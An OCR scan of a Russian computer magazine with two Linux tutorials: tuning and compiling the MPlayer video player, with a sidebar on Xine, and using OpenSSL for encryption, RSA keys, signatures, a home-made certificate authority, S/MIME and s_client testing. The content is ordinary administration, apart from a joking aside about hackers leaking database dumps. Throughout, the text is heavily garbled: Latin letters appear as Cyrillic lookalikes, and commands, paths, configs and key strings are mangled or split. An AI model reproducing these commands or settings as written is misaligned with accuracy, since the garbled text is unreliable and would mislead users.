(ѵѵжтріауег^.ііи), забираем све- 
жий исходник, скины, распаковываем и ком- 
пилируем. 

Если скрипт конфигурации пишет, что ему 
чего-то не хватает, то устанавливаем беѵеі- 
пакеты с заголовочными файлами и библио- 
теками, которые нужны Мріауег'у- Некоторые 
из них обязательны, некоторые - нет. В лю- 
бом случае, читай то, что выводит на экран 
скрипт сопйдиге, - там все подробно распи- 
сывается. Если же он сообщает, что твоя 
версия компилятора ему не нравится, тогда 
тебе повезло - твой дистрибутив древний и 
с такой версией ОСС, которая считается раз- 
работчиками Мріауег'а очень глючной (име- 
ется в виду 2.96), пахать не хочет. В случае 
возникновения этой проблемы передай сво- 
ему скрипту, чтобы он не обращал внимания 
на версию: 



И не забудь, что для компиляции Мріауег'а с 
поддержкой графического интерфейса нужно 
сделать две вещи: установить беѵеі- пакет от 
СТК 1 .х (именно первого СТК, не второго) и 



добавить к параметрам сопТідиге ключик 
-епаЫе-диі: 

# УсопЛдиге --епаЫе-диі 




# ./сопЕідиге --сІізаЫе-дсс-сЕіескіпд 





Прежде чем запускать плеер, позаботься об 
использовании в нем качественных, точных 
таймеров. Мріауег поддерживает несколько 
видов таймеров. Есть программный, который 
включается опцией -зойзіеер, однако он пот- 
ребляет немало вычислительных ресурсов. Це- 
лесообразнее использовать таймер РГГС (РеаІ 
Тіте СІоск). Как правило, доступ к нему имеет 
только гооі. Чтобы получить доступ к РТС и в 
аккаунте обычного пользователя, необходимо 
переопределить права для псевдоустройства 
/беѵ/ііс. Задать частоту таймера можно, про- 
писав в файле /еЕс/зузсЕІ.сопЕ строчку 

{іеѵ.гіс.тах-ішТгеч = 1024 

Таким образом, значение будет устанавли- 
ваться при каждом старте 1_іпих. И дай ко- 
манду в консоли, чтобы изменения вступили 
в силу прямо сейчас: 

# есііо 1024 > /ргос/зуз/беѵ/гіс/тах-изег-І'гец 

Таймер РТС обеспечивает точность в 1 мил- 
лисекунду, а обычный таймер, не зойзіеер, - 
1 0 миллисекунд. 

А только консопь 

Теперь обратимся к консоли. Я понимаю, что 
графический интерфейс удобен в некоторых 
случаях, но Мріауег всегда был ориентирован 
на консоль, СІІІ же в нем вторично. Консоль- 
ная версия Мріауег'а для знающего человека 
проста и удобна. Ничто не сравнится с быст- 
ротой ее запуска. В пальцах, лежащих на кла- 
виатуре, таится волшебство. Знаешь ли ты, 
что клавишами + и - на цифровой части кла- 
вы можно подстраивать синхронизацию звука 
и видео? А знаешь ли ты, что 0 и 9 уменьша- 
ют и увеличивают громкость? И что осталь- 
ные клавиши с цифрами от 1 до 8 регулируют 
контраст, яркость, оттенок и насыщенность? 
Что до последних, то работают они только в 
случае использования режима вывода с аппа- 
ратной акселерацией, например хѵ, (х)ѵісііх 
или (х)тда, либо при включенном програм- 
мном эквалайзере. Как его включить? Опцией 
видеофильтра, указав включение эквалайзера 
как параметр к этому фильтру: тріауег -ѵЕ ец 
имяфайла или тріауег -ѵЕ ец2 имяфайла. А 
хочешь, фокус покажу? Вот так можно смот- 
реть фильм в негативном отображении: 

# тріауег -ѵЕ ец2=1.0:-0.8 Ѵі(1ео0иі.аѵі 

Конечно, кому-то покажется удобнее видео- 
эквалайзер графического интерфейса, тем 
более что он совмещен с аудиоэквалайзе- 
ром. Но есть способ использовать звуковой 
эквалайзер и в консольном режиме. Управля- 
ется он через конфиг -/трІауег/сопТід либо 
командной строкой. Эквалайзер имеет 10 
частотных полос. Вот как разбросаны по ним 
средние частоты каждой полосы: 



Таблица соответствия полос и частот 



0 - 31.25 Н2 

1 - 62.50 Н2 
2-125.0 Н2 

3 - 250.0 Н2 

4 - 500.0 Н2 

5 - 1.000 кН? 

6 - 2.000 кН2 

7 - 4.000 кН2 

8 - 8.000 кН2 
9-16.00 кН2 



МРІПѴЕП БЕЗ СЕКРЕТОВ 



Для каждой полосы ты можешь указать коэф- 
фициент увеличения или уменьшения гром- 
кости, от -12 до +12 децибел. Давай снизим 
на 1 2 децибел нулевую полосу: 

И тріауег -а! ециаІІ2ег=-12:0:0:0:0:0:0:0:0:0 ѴібеоОиіаѵі 
Или увеличим на 1 2 девятую: 

И тріауег -а! ециаІІ2ег=0:0:0:0:0:0:0:0:0:12 ѴібеоОиіаѵі 

Как видишь, каждая позиция в параметре для 
ециаіііег обозначает одну полосу эквалайзе- 
ра. Хочешь поддать басов - увеличивай низ- 
кие частоты. А если они слишком громкие и 
динамики хрипят - уменьшай. Так же посту- 
пай и с верхами. Ключ -аТ служит для обозна- 
чения используемого тобой звукового фильт- 
ра (аисііо Шег). Формат прописывания его в 
конфиге будет немного другой: 

аТ=едиаІІ2ег=0:0:0:0:0:0:0:0:0:0 

Замени нули нужными тебе значениями и 
повторяй упражнения до достижения совер- 
шенства. 

О звуке скажу тебе еще одну вещь. Ѵісіео СО, 
а также файлы, являющиеся рипами с этого 
формата, могут воспроизводиться со звуком, 
наполненным металлическим дребезжанием. 
Вероятно, так действует звуковой кодек, выб- 
ранный по умолчанию. Решение проблемы 
заключается в использовании другого кодека. 
Кодек МАЭ справляется с декодированием, 
не производя при этом упомянутого звуково- 
го артефакта. Поэтому в -/трІауег.сопЕід до- 
бавь строку 

ас=таб, 

Обрати внимание на запятую в конце. Она 
необходима, чтобы плеер мог перебирать 
другие звуковые кодеки, если МАО по какой- 
то причине не подойдет. А вообще МАО - это 
быстрый целочисленный МРЗ-кодек, доволь- 
но популярный в определенных кругах и 
обычно включаемый в состав дистрибутивов 
Шпих (намного чаще, чем Ц\МЕ). Он исполь- 
зуется также, например, в АибасіЕу для им- 
порта МРЗ -файлов. 

А 080 И СУБТИТРЫ 

ОЗО (Оп Зсгееп Оізріау) и субтитры - вещи 
взаимосвязанные, однако не равнозначные. 
ОЗО не зависит от субтитров, но служит для их 
отображения на экране. Также без ОЗО ты не 
увидишь ни текущих показателей громкости 
или яркости, ни времени, прошедшего с нача- 
ла фильма и оставшегося до его окончания, ни 
других, не менее полезных сообщений. 

ОЗО может работать в нескольких режимах, 
которые циклично переключаются по нажатии 
на клавишу с буквой «о». Чтобы правильно 
работали субтитры для не ОѴО-форматов и 
функционировал ОЗО, нужно в директорию 




Смотрим загрузку СРУ при просмотре фильма 



-/тріауег положить файл зиЬЕопЕ.Ш (именно 
с таким именем). Он должен быть шрифтом 
формата ТТР либо ссылкой на такой файл. 
Хорош в этом плане, например, шрифт АгіаІ 
из комплекта ѴѴіпсІоѵѵз. 

О субтитрах. У нас в стране наиболее попу- 
лярны субтитры формата ЗРТ. Если в них зак- 
лючен русский текст, то он, как правило, на- 
ходится в кодировке СР 1251 - стандартной 
кодировке ѴѴіпсІоѵѵз для русского языка. Про- 
пиши в ~/ т р Іауе г/сопТід следующую строку: 

$иЬср=ср1251 

Этим самым мы задаем кодировку для суб- 
титров. Чем лишний раз передавать ее в ко- 
мандной строке, проще раз и навсегда про- 
писать в конфиге. А если понадобится коди- 
ровку временно переопределить, то можно 
будет это сделать уже в командной строке, 
например так: 

# тріауег -зиЬср коі8г 

По ходу просмотра фильма, если субтитры 
отстают или спешат, можно настроить их 
синхронизацию с помощью клавиш I и X. 
Субтитры можно включать и выключать кла- 
вишей V, а ^ переключает их язык, однако у 
меня это почему-то не работает, и поэтому 
приходится выбирать язык, отличный от того, 
что по умолчанию, передавая в командной 
строке параметр -зіапд. Например я хочу 
посмотреть «Амели» на французском, но с 
русскими субтитрами. Тогда я даю в консоли 
команду: 

И тріауег Ы.ІІ -зіапд ш -аіапд Ег 

Замечу, что параметр -зіапд задает язык суб- 
титров, а -аіапд - язык звукового потока. 
Кстати, если Мріауег вообще не хочет видеть 
твой ОѴО-ПОМ, то на это могут быть две 
причины. Первая - ты его подмонтировал. А 
для воспроизведения ОМО этого делать не 
нужно. Если же ОМО размонтирован, но плеер 
все равно не видит его, то пиши в -/тріау- 
ег/сопТід такую строку: 

(1ѵ(1-(1еѵісе=/(1еѵ/Еі(1(1 

Где вместо /сІеѵ/ГісІсІ подставь, разумеется, 
твое ОѴО-устройство. 




А МРІЛѴЕК + М02ІІ1Н + РІВЕРОК 
+ ОРЕНП = ДР!ШБП 

Насколько я знаю, ХРІ -плагина под это дело 
нет, и я не уверен, что одними средствами 
ХРІ можно обойтись. Тем не менее, сущест- 
вует плагин Мріауег-іп (трІауегрІид-іп.$Е.пеЕ), ко- 
торый работает как в МогіІІа, так и в РігеТох. 

Я не стал собирать этот плагин из исходника 
и просто скачал РРМ -пакет для Ресіога Соге 
(он подходит и для Мапбгаке). 

Ставим РРМ. По сути дела, плагин состоит 




л Для работы под 
управлением 
фронт-энда 
Мріауег может 
функционировать в 
режиме $1аѵе, ко- 
торый включается 
параметром -$Іаѵе. 
В этом случае пле- 
ер читает команды 
из 5ТОШ. Список 
поддерживаемых 
команд можно по- 
лучить так: тріауег 
-іприі стсііізі. 
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заманчивая 

аяыЕРнатива 

О тонких настройках плеера Хіпе 
(хіпеііч.йе) пишут мало, потому что все 
опции и функции у него на виду и ка- 
кую-либо дополнительную технику 
его настройки трудно изобрести. Тем 
не менее, Хіпе (читается, согласно 
мнению разработчиков, как «ксин») 
является вторым по популярности 
видеоплеером в Ыпих и предоставля- 
ет ряд возможностей, которых 
Мріауег пока не имеет. 

Хіпе как таковой представляет собой 
движок в виде разделяемых (зііагесі) 
библиотек, к которым существует 
несколько графических фронт-эндов. 
Самые популярные из них - это Хіпе- 
1)1 и Схіпе. Можно назвать также 
Тоіепл, КаТТеіпе и Зіпек. Практически в 
любом дистрибутиве Ыпих Хіпе идет в 
комплекте с Хіпе-ІЛ, и пользователи, 
запуская последнюю, думают, что это 
и есть сам Хіпе. 

Хіпе представляет только декодирую- 
щие функции и не оснащен, в отличие 
от Мріауег'а, утилитой для кодирова- 
ния видео. Хіпе не умеет также пока- 
зывать обычное ТВ с карты тюнера, 
хотя есть экспериментальная подде- 
ржка ОѴВ (ОідіІаІ Ѵісіео Вгоабсазі:), 
что, впрочем, для стран бывшего 
СССР не столь актуально. Никто, 
кстати, не будет отрицать, что для 
просмотра обычного телевещания 
Мріауег тоже подходит не лучшим об- 
разом и пользователи предпочитают 
для этих целей что-нибудь вроде 
Хаѵѵсіесосіе. 





из двух бинарных файлов (тріауегріид-іп.зо 
и тріауегріид-іп.хрі) и двух конфигов (тріау- 
егрІид-іп.сопТ и тріауегріид-іп.іурез). Пос- 
ледние два должны быть размещены в /еіс. 
Также копируем или делаем симлинки на би- 
нарники из пакета, а именно: тріауегріид- 
іп.зо должен лежать в /изг/ІіЬ/тогіІІа- 
твоя версия/ріидіпз, а тріауегріид-іп.хрі в 
/изг/ІіЬ/тогіІІа-твоя вер- 
сия/сотропепіз/трІауегрІид-іп.хрТ 
Чтобы проверить, нашла ли МогіІІа плагин, 
дай в адресной строке браузера команду 
аЬоиі:рІидіпз. Если все в порядке, то откро- 
ется страница с информацией, что-де есть 
такой, «ОиіскТіте РІид-іп 6.0, ѴѴіпсІоѵѵз 
Месііа РІауег РІидіп аге зиррогіесі Ьу тріау- 
егріид-іп», установлен, и далее будет пере- 
чень поддерживаемых форматов. Как ре- 
зультат, браузер будет показывать кино в 
отдельном окне или табе. 

Аналогично поступаем и с РігеТох: копируй 
эти же плагины в соответствующие подка- 
талоги директории, где у тебя установлен 
РігеТох, только в названиях целевых ката- 
логов для копирования файлов вместо 
МоііІІа будет РігеТох. 

Упомянутый мною ВРМ-пакет подходит как 
для относительно старой версии МогіІІа 
1 .7.2, так и для РігеТох, включая версию 1 .0. 
На сайте есть также пакеты для других дист- 
рибутивов І_іпих, не только Ресіога. Протести- 
ровать работу плагина проще всего на стра- 
нице Тге(1гік.ІіиЬЬе.пеТ/рІиддегЛе$ШтІ. 

А как подружить браузер Орега и плагин? 
Сначала необходимо собрать плагин из ис- 
ходников. Для этого надо взять, кроме само- 
го исходника плагина, также и Сеско ЗОІ_. Я 
не знаю, какая у тебя версия МогіІІа или 
РігеТох, поэтому соответствующий их версии 
ЗОК ищи на ТТр.то 2 ІІІа.огд/риЬ/то 2 ІІІа.огд. Напри- 
мер для РігеТох 1 .0 ЗЭК лежит на 
ТТр.то2ІІІа.огд/риЬ/то2ІІІа.огд/ТігеТох/геІеа$ез/1.0/$сІк/. 
Замечание: ЗЭК не должен быть старше, чем 
для МоііІІа 1 .6. 

Установив Сеско ЗЭК (хотя для Орега оно 
вроде и не нужно, но плагин требует), кон- 
фигурируем исходник плагина следующим 
образом: 

# ./сопТідиге --епаЫе-х 

Затем уже делаем таке, после чего копиру- 
ем тріауегріид-іп.зо в нужный каталог Орега, 
примерно так: 

# ср тріауегріид-іп.зо /изг/ПЬ/орега/рІидіпз 

И делаем симлинк на ІіЬхрсот.зо: 

# Іп -$ /и$г/ІіЬ/то 2 ІІІа/ІіЬхрсот.зо /и$г/ПЬ 

Последнее надо для того, чтобы теперь уже 
оперный плагин увидел нужную ему библио- 
теку. Управление плагином осуществляется 
через файл трІауегрІид-іп.сопТ. 



Некоторые интересные опции трІауегрІид-іп.сопТ 



Сасііезііе - размер кэша в килобайтах. Здесь задается 
порция, по сколько килобайт будет читать плагин, преж- 
де чем показывать видео и воспроизводить звук. 
Иотебіасас1іе=0 или 1. Если 1, то кэш вообще не исполь- 
зуется, передача/отображение идет напрямую. 
Сасііе-регсепі - значение в процентах. Сколько процентов, 
от 0 до 100, файла загружать в кэш. По умолчанию 35. 

Ѵо - видеодрайвер для вывода. Тут уместно использо- 
вать значение хіі. 



ОІоагНіг - директория. Сюда будут складываться выка- 
чанные фильмы. Если, конечно же, они сохраняются. А 
чтобы они сохранялись на диск, надо включить такую 
возможность (по умолчанию она выключена): кеер- 
боѵѵпІоасМ. 




Тестируем плагин 



А ПОСЛЕДНИЙ СОВЕТ 

Напоследок дам еще один совет: как де- 
лать в Мріауег'е скриншоты. Это не так 
просто, как кажется на первый взгляд. Де- 
ло в том, что функция создания скриншо- 
тов в Мріауег'е реализована на текущий 
момент только в виде патчей, которые 
подходят исключительно к конкретным 
версиям плеера. Поэтому люди, желающие 
выцепить из фильма картинку, пытаются 
использовать для этого какую-нибудь 
внешнюю утилиту вроде СІІМР или 
КЗпарзІіоІ. Но у них часто не получается. 
Это происходит из-за того, что скриншот с 
видеоокна Мріауег'а можно взять только 
при определенных драйверах вывода на 
экран. Наиболее популярный из них, Хѵ, 
который задается опцией -ѵо ѵх, не подхо- 
дит. Подойдет хі 1 (-ѵо хі 1 ), а также 
ОрепСИ (-ѵо ді). Но замечу, что наилучшие 
скриншоты можно получить в утилитах для 
редактирования видео, такой как, напри- 
мер, Аѵібетих2, где удобно покадрово 
прокручивать фильм. ЗС 




Мріауег в процессе воспроизведения 



^Узнать, какие устройства вывода 
видео поддерживаются в твоей сбор- 
ке Мріауег'а, можно командой тріау- 
ег -ѵо Ііеір. Аналогично для выясне- 
ния звуковых способностей плеера 
используй команду тріауег -ао Иеір. 
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се знают, что такое 0реп$8І.. По крайней нере, хотя бы по уязвимостям о тос1_ззІ дня апача ;). Однако ОрепООІ. - это настоящий 
криптографический тупкит, который разве что кофе не варит. Рассказать здесь обо всех его возможностях нереально, но я попытаюсь 
познакомить тебн с основными обпастями применения этой полезной утилиты. 
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А ШИФРУЕМ И ПОДПИСЫВПЕМ 

С амое простое, что может делать 
ОрепЗЗЦ - шифровать файлы, 
как симметричными алгоритма- 
ми, когда для шифрования и 
расшифровки нужна одна и та 
же парольная фраза, так и 
асимметричными, с использо- 
ванием РЗА-ключей. Например 
зашифруем файл симметричным алгорит- 
мом сІезЗ с помощью орепззі епс: 



# есію ѵегуѵегузесгеііп(о > рІаіпМ 



# орепззі епс -сІезЗ -е -іп рІаіпМ -оиі епс.іхі 
епіег сІез-есІеЗ-сЬс епсгурііоп раззѵѵогсі: 

Ѵегі!уіпд - епіег (Іез-есІеЗ-сЬс епсгурііоп раззѵѵогсі: 

Как видишь, епс.М содержит нечитаемый 
текст. Расшифровать файл можно, заменив 
ключ -е ключом -6: 

# орепззі епс -сіезЗ -сі -іп епс.іхі: -оиі ріаіп.іхі 
епіег (іез-есіеЗ-сЬс (Іесгурііоп раззѵѵогсі: 

Чтобы получить шифртекст в Ьазе64-коди- 
ровке (АЗОМ -текст), используй ключ -а. 
ОрепЗЗЬ установлен практически на каждой 
машине, и с его помощью можно быстро за- 
шифровать информацию для передачи ее по 
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Думаешь, это мусор? Зашифрованный файл! 
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недоверенным каналам. Не знающие данной 
фишки хацкеры по-прежнему используют убо- 
гий іір с паролем, чтобы слить дамп базы через 
чужой приватный проксик ;). К этому можно до- 
бавить, что Ореп88І_ поддерживает великое 
множество симметричных шифров, в том числе 
самые стойкие на сегодняшний день АЕЗ (алго- 
ритм НцпсІаеІ) и ЮЕА. Вместо -сІезЗ можно ука- 
зать требуемый шифр. 

Если же ты хочешь, чтобы собеседник пере- 
дал тебе файл в зашифрованном виде, а ты 
его расшифровал, то стоит озаботиться 
асимметричной криптографией, сгенериро- 
вав себе пару ВЗА-ключей, публичный и при- 
ватный, с помощью орепззі депгза: 

# орепззі депгза -оиі гзаргіѵаіекеу.рет -безЗ 2048 

бепегаііпд К5А ргіѵаіе кеу, 2048 Ьіі Іопд тоОиІиз 
+++ 



е із 65537 (0x10001) 

Епіег разз рИгазе Еог гзаргіѵаіекеу.рет: 

ѴегіЕуіпд - Епіег разз ріігазе Еог гзаргіѵаіекеу.рет: 

Аргумент -сІезЗ указывает, что приватный 
ключ следует зашифровать по алгоритму Тгіріе 
ЭЕЗ парольной фразой. При каждом исполь- 
зовании ключа тебе придется вводить эту 
фразу. Это безопасно, но часто неудобно, так 
что можешь опустить этот параметр. Проставь 
на ключ права 600, чтобы никто в системе не 
мог его прочитать, да и вообще береги его как 
зеницу ока. Получить соответствующий закры- 
тому публичный ключ можно с помощью 
орепззі гза: 

И орепззі гза -іп гзаргіѵаЕекеу.реш -риЬоиЕ -оиЕ гзариЬІіск- 
еу.рет 

Епіег разз ріігазе Еог гзаргіѵаіекеу.рет: 
ѵѵгіііпд КЗА кеу 




кутХ80рЕІіѵѵЕШЕѵпѵѵШ + оіКіупо + Ш8ухѵііЕМСМЗМ0ХХЕ1ІѴ4УАк 

Ѵ820703Лі6р 

МОШАОАВ 

ем ривис кеу 

Этот публичный ключ ты передаешь собесед- 
нику, и он шифрует файл на нем, используя 
орепззі гзаиіі: 

# орепззі гзаиЕІ -епсгурЕ -риЫп -іпкеу гзариЬІіскеу.реш -іп 
рІаіпМ -оиЕ сірііег.іхі 

Теперь ты получаешь файл и расшифровыва- 
ешь его, используя свой секретный ключ: 

# орепззі гзаиіі -бесгурі: -іпіеу гзаргіѵаіекеу.реш -іп 
сірІіег.М -оиЕ рІаіпМ 

Разумеется, знание твоего публичного ключа 
не поможет вскрыть шифртекст. Кроме шиф- 
рования, можно также подписывать файлы, 
предоставляя гарантии, что данный файл 
послан лично тобой, и давая возможность 
проверить его аутентичность. Делается это с 
помощью орепззі сідзі: 

И орепззі бдзЕ -зііаі -зідп гзаргіѵаіекеу.реш -оиі зідпМ 
шуЛІеіаг.дг 

Весьма логично, что шифрование происходит 
на публичном ключе, тогда как для подписи 
используется секретный. Естественно, про- 
цесс подписывания никоим образом не шиф- 
рует файл, но файл, разумеется, может быть 
и зашифрован, и подписан. Все, что нужно 
получателю файла, - это проверить подпись, 
используя твой публичный ключ: 

# орепззі бдзі: -зііаі -ѵегіЕу гзариЬІіскеу.реш -зідпаіиге 
зідп.іхі шуЕіІе.іаг.дг 

ѴегіЛеб 0К. 

Если подпись не совпадает, ты получишь со- 
общение Ѵегійсайоп Раііиге. Строго говоря, 
подписывается не файл, а теззаде сіідезі, 
или контрольная сумма файла. Она также мо- 
жет быть вычислена и без использования 
ключей. Тебе наверняка знакома утилита 
ГПСІ5, которая высчитывает хэш файла (тсІ5- 
сумму), позволяющий убедиться в его аутен- 
тичности. Если изменить в файле хотя бы 
бит, его тсіб-сумма полностью изменится. 
Ореп88І_ позволяет вычислять хэш, исполь- 
зуя ГПСІ5, зМа, зііаі , тсІс2 и т.д. Во многих 
Шпих-дистрибутивах утилита тсіб отсутству- 
ет, но ты все равно можешь вычислить конт- 
рольную сумму, используя орепззі сідзі: 

И орепззі бдзЕ -тсІ5 туЛІе.Еаг.дг 
М05(ту!іІе.іаг.д2) =65Ь36Е8(І54Ь8ЬаЬ0а787сЬ(І4а8(І(І8аеЕ 

Еще с помощью Ореп88І_ можно быстро сге- 
нерировать себе пароль, ѴѴЕР-ключ и прочее, 
используя орепззі гапсі: 

И орепззі гапб -Ьазе64 45 

032тШ0ЕЗѴѴІ7РТЛУсд1ѵѵ8у08ѵѵЕЕЗтВ7ѴѴ(17ѵ(1АѴ(12А6х0сТНтѴ 

УдІ/5иЗо5дЬ 

Чтобы найти соответствующие пароль и 
шифр, например если ты по какой-то причи- 
не решил напрямую править /еіс/тазіег.разз- 
ѵѵсі (/еіс/зііасіоѵѵ), можно использовать 
орепззі раззѵѵсі: 

# орепззі раззѵѵсі -1 шураззѵѵогсі 
$1$0зшехМШ$0Ш1Ь6пЬ6056КМ8]КМ0. 

Параметр -1 в данном случае указывает на 
использование алгоритма тсІ5, которым по 
умолчанию шифруются пароли во 
РгееВ80/І\ІеШ8Э и многих дистрах линуха. 



Л Р0Б0Т0ЕИ С СЕРТИФИКПТПМИ 

Ореп88І_ очень часто применяют именно для 
работы с цифровыми сертификатами. И не- 
мудрено, ведь в этом тулките есть все, чтобы 
построить свой маленький СА и выдавать 
сертификаты. Сейчас очень модно говорить о 
цифровых сертификатах и сертификацион- 
ных, или удостоверяющих, центрах. Что же 
это такое? 

Вернись в начало статьи, где я рассказываю 
про асимметричную криптографию и В8А- 
ключи. Для того чтобы N человек могли об- 
щаться между собой, например подписы- 
вать и шифровать файлы, каждый должен 
иметь пару ключей - публичный и секретный 

- и каким-то образом, допустим, через пер- 
сональную ѵѵеЬ-страничку, предоставить 
свой риЫіс кеу всем (N-1) людям. Очевидны 
две проблемы: 

- Получать и хранить все (N-1) ключей, пер- 
сонально запрашивая каждый у его владель- 
ца, весьма затруднительно. Да еще если 
учесть, что люди могут терять/раскрывать 
свои ключи и генерировать новые. Как я уз- 
наю, что один из моих респондентов сгене- 
рировал новый ключ и старый уже недей- 
ствителен? 

- Как удостовериться, что публичный ключ со- 
беседника принадлежит ему? Что его ѵѵеЬ- 
страничка с ключом не была взломана, а ключ 
заменен? 

Для решения этих проблем было решено 
ввести новый доверенный орган, который 
назвали СегіШсаІе Аиіііогііу, он же СА, он же 
по-русски удостоверяющий центр, и теперь 
все участники, сгенерировав себе пару клю- 
чей риЫіс и ргіѵаіе, не ломают голову, а отп- 
равляют свой публичный ключ этому СА. 
Причем не в голом виде, а как запрос на сер- 
тификат - по сути, тот же ключ, с прописан- 
ными персонализирующими владельца ключа 
полями: имя, фамилия, город, адрес. 

Х509 - это стандарт на сертификаты. СА полу- 
чает запрос и выдает автору ключа уже полно- 
ценный сертификат, одновременно удостове- 
ряя авторство ключа, подписывая его своим 
ргіѵаіе кеу и размещая сертификат клиента для 
публичного доступа. Таким образом, сертифи- 
кат - тот же риЫіс кеу, только оформленный в 
специальном виде. Наконец, если кто-то теря- 
ет или раскрывает свой закрытый ключ, он 
создает СА-запрос на отзыв сертификата 
(СегіМісаІе Реѵокайоп). СА помечает сертифи- 
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Соединение, защищенное при помощи з_сІіепі 



кат как отозванный, помещая информацию о 
нем в специальный список, СВІ_ (Сегііііісаіе 
Веѵокаііоп Шзі). Теперь, чтобы проверить, 
действителен ли ключ, нужно всего лишь ска- 
чать с сайта СА свежий СВІ_ и проверить нали- 
чие в нем сертификата респондента. 

Эта красивая схема содержит одно слабое 
звено - все участники обязаны безоговороч- 
но доверять СА, ведь к нему они обращают- 
ся за ключами других людей, за СВІ_, да и 
сам СА непосредственно отвечает за то, что 
конкретный человек имеет данный ключ. Вот 
почему во всех странах функционирование 
официальных СА подведено под мощную 
юридическую базу и выпущены соответству- 
ющие законы. В России существует закон 
«Об электронной цифровой подписи», сог- 
ласно которому юридическую силу имеют 
только те СА, которые используют для под- 
писи и шифрования отечественные крипто- 
алгоритмы, соответствующие ГОСТам. Под- 
пись, оставленная клиентом такого СА под 
электронным документом, на уровне закона 
приравнена к личной ручной подписи на бу- 
маге. Впрочем, нам сгодится и ВЗА, мы же 
не ведем переписку государственной важ- 
ности ;). 

Для разворачивания полноценных СА суще- 
ствуют удобные фронт-энды, например 
ТіпуСА. Нас, как всегда, интересует консоль- 
ная подноготная всего процесса. Поэтому 
сейчас мы запустим свой маленький СА и 
выдадим на нем сертификат нашему веб- 
серверу. Генерируем ВЗА-ключ для СА: 

# орепззі депгза -безЗ -оиі туса.кеу 2048 

# сіітосі 600 туса.кеу 

Перед тем как генерировать запросы и сер- 
тификаты, советую взглянуть на орепззі. спі 
(/еТс/ззІ/орепззІ .спТ) , в котором прописаны 
поля сертификата, их обязательность и де- 
фолтные значения. Можешь поменять их, 
чтобы было проще, или даже указать все 
значения прямо в запросе (ключ -зиЬі). Вы- 
пустим самоподписанный сертификат на 
сгенерированном ключе: 

# орепззі гец -пеѵѵ -х509 -гіауз 365 -кеу туса.кеу -оиі 

туса.сгі 

Тебе будет задано несколько вопросов каса- 
емо полей сертификата, и в результате ты 
получишь самоподписанный сертификат 
туса.сгі. Теперь сгенерируем еще один 
ключ, для АрасГіе: 

# орепззі депгза -оиі зегѵег.кеу 2048 

Создадим запрос на сертификат СЗВ 
(Сегіііісаіе Зідп Вециезі): 

# орепззі гед -пеѵѵ -кеу зегѵег.кеу -оиі зегѵег.сзг 



Подпишем запрос на ключе СА и выдадим 
нашему серверу новый сертификат: 

# орепззі х509 -гед -сіауз 365 -СА туса.сгі -САкеу 
туса.кеу -іп зегѵег.сзг -оиі зегѵег.сгі 

# орепззі ѵегііу -САііІе туса.сгі зегѵег.сгі 

В процессе работы ОрепЗЗІ- ищет сертификат 
СА, СВ1_ и некоторые другие параметры сог- 
ласно файлу конфигурации /еіс/ззі/орепззі.спі. 
Поэтому неплохо бы его заполнить, это изба- 
вит нас в том числе и от ввода параметров 
-СА, -САкеу и т.д. Так, если ты назвал свою СА 
МуСА и расположил иерархию каталогов в 
/еіс/ззі, то внеси в конфиг: 



# ѵі /еіс/ззІ/ореп$$І.спі 



[са] 


бе1аиІі_са 


= МуСА 


[ МуСА ] 


(ІІГ 


= /еіс/ззі 


сегіз 


= $біг/сгі 


сгМіг 


= $сііг/сгІ 


баіаЬазе 


= Згііг/іпбех.іхі 


пеѵѵ_сегіз_сІіг 


= $(1іг/сгі_пеѵѵ 


сегіііісаіе 


= Збіг/са.сгі 


зегіаі 


= Зсііг/зегіаІ 


СГІ 


: Збіг/туса.сгІ 


ргіѵаіе_кеу 


= Збіг/туса.кеу 



Теперь все будет складываться в /еіс/ззі. Нап- 
ример если мы хотим отозвать сертификат 
сервера по причине изменения его адреса, то 
пишем: 

# орепззі са -геѵоке зегѵег.сгі -сгІ_геазоп 
аіііІіаііопСІіапдегІ 

Сгенерируем актуальный список отзыва СВІ_: 

# орепззі са -депсгі -оиі туса.сгі 

В іпбех.іхі должна появиться запись о смене 
статуса сертификата зегѵег.сгі. Просмотреть 
же СНІ_ можно следующей командой: 

# орепззі сгі -іп са.сгі -іехі -пооиі 

Сам сертификат и его ключ можно просмот- 
реть схожим образом: 

# орепззі х509 -іп зегѵег.сгі -пооиі -іехі 

# орепззі гза -пооиі -іехі -іп зегѵег.сгі 

Как настраивать Арасііе с тосі ззі, написано 
уже неоднократно, и я повторяться не буду. 
Но почему-то все ограничиваются банальной 
поддержкой ИНрз, а ведь с сертификатами 
можно натворить немало забавного. Напри- 
мер создать папку ззі-агеа с правом доступа 
только для тех клиентов, у которых установ- 
лены в системе и указаны в браузере выдан- 
ные тобой сертификаты. Для этого пропиши 
в конфиг ззі-хоста апача: 

<и)саііоп /ззІ-агеа> 

ЗЗНіедиігеЗЗі 
ЗЗіѴегііуСІіепі гедиіге 
ЗЗІѴегііуРеріІі 1 
<Досаііоп> 

Важное замечание. Теоретически сертификат 
- это открытый ключ. И некоторые програм- 
мы, тот же Арасііе, разделяют понятия «сер- 
тификат» и «закрытый ключ» (и правильно), 
требуя указать в конфиге и то, и другое. Но 
некоторый софт, например ѵзйрсі, ищет в 



сертификате как публичный, так и закрытый 
ключ. Поэтому если ты хочешь упростить се- 
бе жизнь или столкнулся с тем, что какая-ли- 
бо софтина не работает, помни, что можно 
просто добавить зесгеі кеу в конец сертифи- 
ката командой саі, хотя это, конечно, идеоло- 
гически неверно. 

А ПОЧТИ? 5МІМЕ! 

В начале статьи мы зашифровывали файлы. 
А что если их надо тут же из консоли отпра- 
вить по почте? Можно, конечно, послать 
А8СІІ -текст: 

# саі азсіі_епсосіесі.іхі | таіі Ііаскег@етаіІ.сот 

Но тогда адресат получит бессмысленный 
набор символов. Так что есть способ лучше - 
3/МІМЕ. Это специальное расширение МІМЕ 
(Миіііріе Іпіегпеі МаіІ Ехіепзіопз) для работы 
с сертификатами. Почтовые клиенты пони- 
мают 8МІМЕ и обрабатывают зтіте-вложе- 
ния соответствующим образом, например 
проверяют подпись. Сертификат у нас есть, 
подпишем им сообщение: 

# орепззі зтіте -зідп -зідпег зегѵег.сгі -іпкеу зегѵег.кеу - 
іп теззаде.іхі -іехі | таіі Ііаскег@етаіІ.сот 

А теперь еще зашифруем: 

# орепззі зтіте -епсгурі -іп теззаде.іхі -зідпег зегѵег.сгі 
-іпкеу зегѵег.кеу -іехі | орепззі зтіте -епсгурі -(ІезЗ 
тузегѵег.сгі -оиі таіі.тзд | таіі ііаскег@етаіІ.сот 

Очень часто бывает нужно протестировать 
работу сетевого сервиса. Обычно для этого 
применяют іеіпеі. Но если сервис работает 
через ЗЗІ_? Тогда нас снова спасет ОрепЗЗІ_: 

# орепззі з_сІіепі -соппесі тузегѵег:443 

